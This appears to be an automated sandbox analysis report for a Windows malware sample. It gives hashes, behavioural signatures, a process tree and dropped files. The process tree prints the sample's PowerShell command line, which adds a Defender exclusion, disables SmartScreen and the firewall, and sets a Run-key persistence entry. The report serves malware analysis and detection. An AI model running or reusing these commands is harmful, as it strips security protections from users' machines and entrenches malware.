Analysis
-
max time kernel
154s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
15-02-2022 13:36
General
-
Target
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe
-
Size
3.4MB
-
MD5
240dc3df45fd2233148581beb6cdb4b1
-
SHA1
6a565becd793e09d7a69ff2a116f821ddc2d79b1
-
SHA256
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a
-
SHA512
0ff80f8192e3bda22f303b78eef624cd2b48fe0bc611c7acdfa48f4cd06b7bc1fcaa60710e8dcae6ccccd35bc0be3ac3e38d12c6e8e8e2d184b412d9a4e9bc52
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe"C:\Users\Admin\AppData\Local\Temp\4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe"1⤵
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)2⤵
- Modifies security service
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 984 -s 20882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\MusNotifyIcon.exe%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 131⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 984 -ip 9841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
memory/984-132-0x00007FF708DE0000-0x00007FF70973B000-memory.dmpFilesize
9.4MB
-
memory/984-130-0x00007FFB26450000-0x00007FFB26452000-memory.dmpFilesize
8KB
-
memory/984-131-0x00007FF708DE0000-0x00007FF70973B000-memory.dmpFilesize
9.4MB
-
memory/2372-146-0x000001AF5FB08000-0x000001AF5FB09000-memory.dmpFilesize
4KB
-
memory/2372-138-0x000001AF5FB00000-0x000001AF5FB02000-memory.dmpFilesize
8KB
-
memory/2372-142-0x000001AF5FB03000-0x000001AF5FB05000-memory.dmpFilesize
8KB
-
memory/2372-137-0x00007FFB05963000-0x00007FFB05965000-memory.dmpFilesize
8KB
-
memory/2372-143-0x000001AF5FB06000-0x000001AF5FB08000-memory.dmpFilesize
8KB
-
memory/2372-139-0x000001AF5FCC0000-0x000001AF5FCE2000-memory.dmpFilesize
136KB
-
memory/3132-154-0x00007FFB05F33000-0x00007FFB05F35000-memory.dmpFilesize
8KB
-
memory/3132-155-0x0000017B71000000-0x0000017B71002000-memory.dmpFilesize
8KB
-
memory/3132-156-0x0000017B71003000-0x0000017B71005000-memory.dmpFilesize
8KB
-
memory/3132-159-0x0000017B71006000-0x0000017B71008000-memory.dmpFilesize
8KB
-
memory/3132-160-0x0000017B712A0000-0x0000017B712E4000-memory.dmpFilesize
272KB
-
memory/3132-161-0x0000017B71590000-0x0000017B71606000-memory.dmpFilesize
472KB